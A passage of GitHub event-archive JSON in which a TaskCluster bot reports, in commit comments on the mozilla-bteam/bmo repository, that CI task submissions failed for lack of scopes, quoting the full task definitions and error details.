\\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"LUuf4YbZQnykQ9I7USeX5Q\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.182Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.182Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"P87ZtGjRRxufUD3r4XjvIw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.182Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.292Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VihClsIBQl2zHcEJMVVKnQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.183Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.183Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.183Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.293Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VihClsIBQl2zHcEJMVVKnQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.183Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.183Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.183Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.293Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"VihClsIBQl2zHcEJMVVKnQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.183Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.183Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"P87ZtGjRRxufUD3r4XjvIw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.183Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.293Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-28T02:27:09Z"}
{"id":"4628129903","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19201178,"position":null,"line":null,"path":null,"commit_id":"4250271527caadb3eefd54ccf068f610f5d93a46","created_at":"2016-09-28T02:27:09Z","updated_at":"2016-09-28T02:27:09Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"O7l6ANVbRXujeGUm5bV2Dg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        